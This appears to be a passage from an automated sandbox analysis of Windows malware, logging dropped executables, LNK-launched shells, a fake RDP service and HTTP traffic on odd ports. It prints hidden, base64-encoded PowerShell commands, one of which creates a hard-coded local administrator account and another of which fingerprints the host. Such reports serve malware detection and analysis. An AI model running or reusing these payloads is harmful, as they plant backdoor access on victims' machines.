QAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline"Jump to behavior
      Source: svczHost.exe.11.drStatic PE information: section name: .managed
      Source: svczHost.exe.11.drStatic PE information: section name: hydrated
      Source: myRdpService.exe.19.drStatic PE information: section name: .managed
      Source: myRdpService.exe.19.drStatic PE information: section name: hydrated
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BB7C9E push eax; retf 2_2_00007FFA83BB7CAD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BB849E push eax; ret 2_2_00007FFA83BB84AD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BB7C6E pushad ; retf 2_2_00007FFA83BB7C9D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BB846E pushad ; ret 2_2_00007FFA83BB849D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BC2C0D push eax; retf 2_2_00007FFA83BC2C11
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BB6B2B push eax; iretd 2_2_00007FFA83BB7049
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BC79D7 push ebx; retf 2_2_00007FFA83BC79DA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83BC75D7 push ebx; iretd 2_2_00007FFA83BC75DA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA83C81B14 push esi; iretd 2_2_00007FFA83C81B17
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFA83AAD2A5 pushad ; iretd 7_2_00007FFA83AAD2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFA83BC1FB5 push eax; iretd 7_2_00007FFA83BC2009
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFA83AAD2A5 pushad ; iretd 11_2_00007FFA83AAD2A6
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFA83C93095 push esi; retf 11_2_00007FFA83C93097
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFA83C93174 push edx; retf 11_2_00007FFA83C93176

      Persistence and Installation Behavior

      barindex
      Windows shortcut file (LNK) starts blacklisted processes
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
      Source: C:\Windows\Temp\svczHost.exeFile created: C:\Windows\Temp\myRdpService.exeJump to dropped file
      Source: C:\Windows\Temp\myRdpService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 8008
      Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 8000
      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49782
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
